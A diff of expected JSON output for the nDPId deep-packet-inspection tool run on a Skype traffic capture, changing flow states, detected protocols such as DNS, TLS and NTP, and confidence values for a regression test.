00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969691076,"flow_last_seen":1431969717999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50079,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969720556,"flow_last_seen":1431969746803,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969683445,"flow_last_seen":1431969709776,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969720556,"flow_last_seen":1431969746803,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969683445,"flow_last_seen":1431969709776,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969675413,"flow_last_seen":1431969703766,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50059,"dst_port":40015,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969675413,"flow_last_seen":1431969703766,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50059,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969673443,"flow_last_seen":1431969701528,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50055,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969673443,"flow_last_seen":1431969701528,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50055,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969677975,"flow_last_seen":1431969704363,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58458,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969677975,"flow_last_seen":1431969704363,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58458,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969695483,"flow_last_seen":1431969723584,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969695483,"flow_last_seen":1431969723584,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969704663,"flow_last_seen":1431969718237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50096,"dst_port":40027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969704663,"flow_last_seen":1431969718237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50096,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642244,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54396,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969642244,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54396,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969725833,"flow_last_seen":1431969741920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969725833,"flow_last_seen":1431969741920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969727446,"flow_last_seen":1431969727738,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":387,"flow_first_seen":1431969642444,"flow_last_seen":1431969808620,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":172532,"flow_avg_l4_payload_len":445,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969713813,"flow_last_seen":1431969733946,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.185.207.12","src_port":13021,"dst_port":45493,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969759543,"flow_last_seen":1431969759588,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.253.48.245","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642334,"flow_last_seen":1431969642400,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":387,"flow_first_seen":1431969642444,"flow_last_seen":1431969808620,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":172532,"flow_avg_l4_payload_len":445,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969713813,"flow_last_seen":1431969733946,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.185.207.12","src_port":13021,"dst_port":45493,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969759543,"flow_last_seen":1431969759588,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.253.48.245","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642334,"flow_last_seen":1431969642400,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969792778,"flow_last_seen":1431969803795,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969792778,"flow_last_seen":1431969803795,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 